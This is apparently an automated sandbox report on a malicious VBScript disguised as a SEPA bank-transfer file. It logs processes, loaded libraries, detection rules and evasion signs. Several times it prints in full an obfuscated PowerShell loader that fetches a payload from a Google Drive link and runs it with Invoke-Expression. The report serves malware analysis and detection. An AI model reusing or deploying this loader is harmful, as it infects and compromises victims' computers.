Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? 
T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnu
Source: Transferencias SEPA.vbs | Initial sample: Strings found which are bigger than 50
Source: amsi64_6536.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal96.expl.evad.winVBS@6/6@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Fldekager.Con
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt50uqrg.tml.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Transferencias SEPA.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Transferencias SEPA.vbs | ReversingLabs: Detection: 21%
Source: Transferencias SEPA.vbs | Virustotal: Detection: 13%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497601B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1433043987.000002497604B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1434067052.00000249760C1000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($S", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Nonconstruction) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFE7E8B7287 push esp; retf 2_2_00007FFE7E8B7288
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFE7E8B7395 pushad ; iretd 2_2_00007FFE7E8B7399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFE7E8B00BD pushad ; iretd 2_2_00007FFE7E8B00C1
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5899
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3929
Source: C:\Windows\System32\wscript.exe TID: 6656 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000002.00000002.1434786548.00000249762DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllar
Source: wscript.exe, 00000000.00000002.1274957057.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261099744.0000023CBC2DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1261364401.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260291454.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260964452.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1268737040.0000023CBC2DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260726728.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1268737040.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1274923366.0000023CBC2DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1269498724.0000023CBC341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1260726728.0000023CBC2B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1272821991.0000023CBC5C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}_~e
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Undervisningsdisketterne = 1;$Strafferammen='Substrin';$Strafferammen+='g';Function Toxophilism87($Sanerendes){$Uneath=$Sanerendes.Length-$Undervisningsdisketterne;For($Vacciners=5; $Vacciners -lt $Uneath; $Vacciners+=(6)){$Ceylonite+=$Sanerendes.$Strafferammen.Invoke($Vacciners, $Undervisningsdisketterne);}$Ceylonite;}function anthropometry($Registrating){& ($Bothroi) ($Registrating);}$Gimmerlams=Toxophilism87 'Ke neMNovelo TarszEbonii NonslMadrelOm kiaFiske/Luffi5,isun. algn0Fagbl Micon( Re lWvejovi.ecannFilmadDockioStudewGhi esOgre. .rocaNReal TUncon S,kke1 pars0Gsteh.Ublod0,risv; ata M,croW SmndiCatapnBefly6Ext.a4Expos;Lande LaissxKolon6Habit4Tandb;Suppe BrndrGloriv Sel,: Buke1Latin2S,eat1Baand. col,0Overm)Cloch vavtoGFodboeRichec.ellmkwhango,leuk/fo,ok2Nim u0Fests1.eesf0Thema0Skrum1Marin0Ilyas1Attr, GodfFPassainon rrMode.eBromdfAandeoMopedxRe ri/haand1Pht.i2Extem1T,lsp.Broug0Kaske ';$Nyttendes=Toxophilism87 ' SpapUDampis.orpueBrugerLabio-PhymaAKllingwergieKarklnHexadtIr,ny ';$Fraraadede=Toxophilism87 'Tentah FientharestTrstepFa,cisLenna: Guns/fabri/Underd UnderUrediiMilitvT,ereeAssyr.Herm gHu oeoOx dioFlelsgHornylRow,ieStere.Realkc Grefo Tallmunend/statsuBa.saccolle? 
T.ndePejlix KiefpDovneoOutmarNuchatU,ndf=QuantdJiliaoInterwTalernBjlenl Midto Tilpa DiskdTakof& Overislen,dElevr=Unpro1 reabqhovedL BevilDis.erBrand6EkspaCCho.diUdv,kWHexadFPiperPB,kseDSpermuGymnoLFu.iofHalvfJZucc,cA keruUn,huC Assap or aG lami8Photo-TiemaGStemmkoutglYTrbesK FyrsiTappexUfor hoverbbBarflztaktlaInddk ';$Pjankede=Toxophilism87 'Grune>Trste ';$Bothroi=Toxophilism87 'unobeiCereve AlarxBrock ';$Perfektibilitet = Toxophilism87 'CentueFla.kcAssonhSceneoDil t Di.ul%.ianoaSubmupMarkopErhvedNonira,ndettShutoa acch%R,mod\Pr teFC,ntrlQu nod.eaveeAlderkG lgeaTulreg IslneB fanrForur.SamfuCTaxikopreponVarme P.dal& andm&Coc f MikreTapnecP,eudhSporioDezin Frike$ ncon ';anthropometry (Toxophilism87 'Poka,$AarstgTillglg,bisoBrevsbStrigaSynsol Pal :SannalKulhyi FrigqStaalu E,evoUniv rJuv.ni Vands KjerhSkrmt= Fors( AblacAbr,kmNonredSuper Sipun/ SvincSanct Jaque$,iltrP AkemeFustirNarkofBludge VarmkMiljbtFolleiModstbSwerviYe.selFab,liLderrtPropie Beket,oist)Anemo ');anthropometry (Toxophilism87 'Cst.d$Ens,agPhenolSensuoSyddab b fia,ocialFnull: PranUDebitnNarcodF ldmeonsetrShaftv UkorgSpitftUntoliM rragSangshTolv,e Tyr,dAtomusC,lic1arbej3Fo ge4Eneba=Brunk$StokeFNeds,rClewkaBacksrUi,enaMaxima RecidS,oene Klipd PolyeUnsad. Ber s PinepRe.atl .akoiHs patUn.es( Send$ semiP NedsjSlagvanonsan SteekUndune,ochudAbse ePr.li)Amfit ');$Fraraadede=$Undervgtigheds134[0];anthropometry (Toxophilism87 'Sji p$ Pe igN.endlUbe,roTilkbb Beaca,rownlStddm:IntraGWeanleMatc,n AmtmaMaidinEncydvGnosteInthrnL.ncedUndfleResmelLy,fosSoniaeVikinsDelmol Pr,lo SeedvMotoreSgekrn Teame.ddans Renv=PiptoNStnkpeOverfwAfvis-OverdO Da.hbfyrrejStorieHeintcMultitEnriq TropSChec,y OrdesEkstetNa abeDrnuJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fldekager.Con && echo $"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$undervisningsdisketterne = 1;$strafferammen='substrin';$strafferammen+='g';function toxophilism87($sanerendes){$uneath=$sanerendes.length-$undervisningsdisketterne;for($vacciners=5; $vacciners -lt $uneath; $vacciners+=(6)){$ceylonite+=$sanerendes.$strafferammen.invoke($vacciners, $undervisningsdisketterne);}$ceylonite;}function anthropometry($registrating){& ($bothroi) ($registrating);}$gimmerlams=toxophilism87 'ke nemnovelo tarszebonii nonslmadrelom kiafiske/luffi5,isun. algn0fagbl micon( re lwvejovi.ecannfilmaddockiostudewghi esogre. .rocanreal tuncon s,kke1 pars0gsteh.ublod0,risv; ata m,crow smndicatapnbefly6ext.a4expos;lande laissxkolon6habit4tandb;suppe brndrgloriv sel,: buke1latin2s,eat1baand. col,0overm)cloch vavtogfodboerichec.ellmkwhango,leuk/fo,ok2nim u0fests1.eesf0thema0skrum1marin0ilyas1attr, godffpassainon rrmode.ebromdfaandeomopedxre ri/haand1pht.i2extem1t,lsp.broug0kaske ';$nyttendes=toxophilism87 ' spapudampis.orpuebrugerlabio-phymaakllingwergiekarklnhexadtir,ny ';$fraraadede=toxophilism87 'tentah fientharesttrstepfa,cislenna: guns/fabri/underd underurediimilitvt,ereeassyr.herm ghu oeoox dioflelsghornylrow,iestere.realkc grefo tallmunend/statsuba.saccolle? 
t.ndepejlix kiefpdovneooutmarnuchatu,ndf=quantdjiliaointerwtalernbjlenl midto tilpa diskdtakof& overislen,delevr=unpro1 reabqhovedl bevildis.erbrand6ekspaccho.diudv,kwhexadfpiperpb,ksedspermugymnolfu.iofhalvfjzucc,ca keruun,huc assap or ag lami8photo-tiemagstemmkoutglytrbesk fyrsitappexufor hoverbbbarflztaktlainddk ';$pjankede=toxophilism87 'grune>trste ';$bothroi=toxophilism87 'unobeicereve alarxbrock ';$perfektibilitet = toxophilism87 'centuefla.kcassonhsceneodil t di.ul%.ianoasubmupmarkoperhvednonira,ndettshutoa acch%r,mod\pr tefc,ntrlqu nod.eaveealderkg lgeatulreg islneb fanrforur.samfuctaxikopreponvarme p.dal& andm&coc f mikretapnecp,eudhsporiodezin frike$ ncon ';anthropometry (toxophilism87 'poka,$aarstgtillglg,bisobrevsbstrigasynsol pal :sannalkulhyi frigqstaalu e,evouniv rjuv.ni vands kjerhskrmt= fors( ablacabr,kmnonredsuper sipun/ svincsanct jaque$,iltrp akemefustirnarkofbludge varmkmiljbtfolleimodstbswerviye.selfab,lilderrtpropie beket,oist)anemo ');anthropometry (toxophilism87 'cst.d$ens,agphenolsensuosyddab b fia,ocialfnull: pranudebitnnarcodf ldmeonsetrshaftv ukorgspitftuntolim rragsangshtolv,e tyr,datomusc,lic1arbej3fo ge4eneba=brunk$stokefneds,rclewkabacksrui,enamaxima recids,oene klipd polyeunsad. ber s pinepre.atl .akoihs patun.es( send$ semip nedsjslagvanonsan steekundune,ochudabse epr.li)amfit ');$fraraadede=$undervgtigheds134[0];anthropometry 